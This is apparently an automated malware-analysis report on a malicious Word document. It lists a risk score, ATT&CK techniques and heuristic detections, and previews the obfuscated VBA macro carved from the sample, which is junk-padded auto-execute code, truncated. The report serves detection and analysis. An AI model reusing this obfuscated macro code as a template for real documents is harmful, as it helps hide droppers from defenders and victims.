MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes CreateObject, a common technique for executing arbitrary code, and is triggered by the AutoOpen function. While the script is heavily obfuscated, its intent is to execute further malicious actions, likely downloading a second-stage payload. The embedded URL is benign, so no IOCs are derived from it.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 188093 bytes |
SHA-256: d244ebd035831bd8d5f2835545e5ede4768d02dd596d0f80903230a97e0ce0ad |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VDxfw4"
Public Function ofqEb3OpKICBH8I(ByRef ACBs21F6upVl8I As String, ByRef THREE As String) As String
Dim NxeCtfUcJqi5ZFS() As Byte
If Application.UserName = "R1dOIhE6d92" Then
MsgBox ("yWnBrsUFGfO")
Else
Dim gLcI7hOkkMP4aS As Integer
End If
Dim Nbdy79aISzGMQqjt9B() As Byte
Dim da2edBOdvcwAXy As Integer
Dim kLZMBlpdi0n As String
da2edBOdvcwAXy = 1372
Dim iuIOCSlEm12 As Integer
kLZMBlpdi0n = Right(CStr(da2edBOdvcwAXy), Chr(Tan(CDbl(1.55039099610836))))
iuIOCSlEm12 = CInt(kLZMBlpdi0n)
For H1ht78t58Nf = iuIOCSlEm12 To 79
da2edBOdvcwAXy = da2edBOdvcwAXy + 9
Next H1ht78t58Nf
Dim EFodG0xujhIRRg As Long
Dim pHpDBWcKfGHpHE As Integer
Dim J15m7t1ITzd As String
pHpDBWcKfGHpHE = 9744
Dim nJffHpXNr50 As Integer
J15m7t1ITzd = Right(CStr(pHpDBWcKfGHpHE), Chr(Tan(CDbl(1.55039099610836))))
nJffHpXNr50 = CInt(J15m7t1ITzd)
For Pr8BmfyUJHd = nJffHpXNr50 To 42
pHpDBWcKfGHpHE = pHpDBWcKfGHpHE + 5
Next Pr8BmfyUJHd
Dim fqJU0NM9TwePb4 As Integer
For EOrNvIbV7Os = 1 To 19
fqJU0NM9TwePb4 = EOrNvIbV7Os
Next EOrNvIbV7Os
Dim uepUL5G5KLogLr As Integer
For VeaNa85QSS7 = 8 To 83
uepUL5G5KLogLr = VeaNa85QSS7
Next VeaNa85QSS7
Dim wytbuHPaWDNLOn, v2wbpsuNsQ2 As Integer
wytbuHPaWDNLOn = 3
v2wbpsuNsQ2 = 6
#If Up4wvLyLJ57 <> 0 Then
Up4wvLyLJ57 = Up4wvLyLJ57 + 6
Dim k8tS89l2DGE As Variant
Else
Dim k8tS89l2DGE As Object
#End If
If wytbuHPaWDNLOn > v2wbpsuNsQ2 Then
For Q4a0257vsGdiVb = v2wbpsuNsQ2 To wytbuHPaWDNLOn
v2wbpsuNsQ2 = v2wbpsuNsQ2 / wytbuHPaWDNLOn
Next Q4a0257vsGdiVb
End If
If Application.UserName = "g0ipUwCG2IU" Then
MsgBox ("AXHl7mWvTDS")
Else
Dim PqjfwpfG5ZUgEY As Integer
End If
Dim kKvOTR2vnMPeqcB As String
kKvOTR2vnMPeqcB = Application.UserName
Dim te98jBpWW01RXRJ9U, ZdN5rA14c41Fpe4Dnhi As Integer
ZdN5rA14c41Fpe4Dnhi = Len(kKvOTR2vnMPeqcB)
Dim pplHZjH33gvSsSSS As Collection
While ZdN5rA14c41Fpe4Dnhi > 1
te98jBpWW01RXRJ9U = te98jBpWW01RXRJ9U + 5
ZdN5rA14c41Fpe4Dnhi = ZdN5rA14c41Fpe4Dnhi - 1
Wend
Dim zoyUi4BqiTALp3Y As Collection
Set zoyUi4BqiTALp3Y = New Collection
zoyUi4BqiTALp3Y.Add "xqJoBpUSlcsMLQcn7x6QjxzZAj5LaiNUw3jWIbw57HNiMWJyCez74mbA2tobuI1COYZSrFegCATblONnaGJ6vQaJbid"
zoyUi4BqiTALp3Y.Add "UKyPKUy60H69R43S9YogABo95R87Q0ImGsrxfLb4Zrj9N6eV"
zoyUi4BqiTALp3Y.Add "cKy1wSgyU2V0q98T3iMDwy7uHTcow9zmbZY8zO6ZTr1iiiBkA3C5JcEnNE"
zoyUi4BqiTALp3Y.Add "02BUFsYRkAgolzuF7YLiS1n361d9VvutediapgdxKt9AXYUVr8qx2LK8OIYNPZ5xPwKIOTab5WY"
zoyUi4BqiTALp3Y.Add "ngihIRWE50SSjMgHQkuyKukNLGXiP3gzmGkm0pHHjuU620pH3Tpvnur26U"
zoyUi4BqiTALp3Y.Add "4yxBUfpdl4RkdmOZanVUbQo6OuJ2YsqfSFNv5SmXK"
zoyUi4BqiTALp3Y.Add "9BESBfScS9BknJ3zjVzF3NwRX"
zoyUi4BqiTALp3Y.Add "eHB7KQvp5KbIWGPXfRfjlBfCBWGlvOw4lCzURB1T2e8nH"
zoyUi4BqiTALp3Y.Add "9n0QA2x1cl86zJJ4qXhgTS5Gd"
Dim lI5vwJvkxyLPmSD As Long
Dim ia69O7LHhljoG7 As Integer
Dim yug4YNpJNnG As String
ia69O7LHhljoG7 = 1568
Dim mBFm5whZJEt As Integer
yug4YNpJNnG = Right(CStr(ia69O7LHhljoG7), Chr(Tan(CDbl(1.55039099610836))))
mBFm5whZJEt = CInt(yug4YNpJNnG)
For AMkbL3Z6M9N = mBFm5whZJEt To 98
ia69O7LHhljoG7 = ia69O7LHhljoG7 + 3
Next AMkbL3Z6M9N
Dim QXZnxFazliF9yL As Object
Dim oe7j4UAnwas9NZ3A As Long
If Chr(Tan(CDbl(1.55728363578157))) = J Then
Dim fYxMe43xqhhWkv As String
Dim YyMmo7qLcRw As String
YyMmo7qLcRw = C9O6k4KP2dj
fYxMe43xqhhWkv = nOoVTyk3AVb
End If
If (StrComp(fYxMe43xqhhWkv, YyMmo7qLcRw, vbTextCompare) <> 0) Then
MsgBox ("YCxYl0gdZ6iZa5")
End If
If Chr(Tan(CDbl(1.5563045877294))) = E Then
Dim QUtZDmNxOao5dQ As String
Dim hOtLHwanh2k As String
hOtLHwanh2k = qYQ7yZcv4TC
QUtZDmNxOao5dQ = TSORxIt197G
End If
If (StrComp(QUtZDmNxOao5dQ, hOtLHwanh2k, vbTextCompare) <> 0) Then
MsgBox ("OnM2UEVvqw0yOO")
End If
If Chr(Tan(CDbl(1.5554129250143))) = A Then
Dim gPgd9C2RT0ywhU As String
Dim BVbYOYewG8L As String
BVbYOYewG8L = bIUGe7zu
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.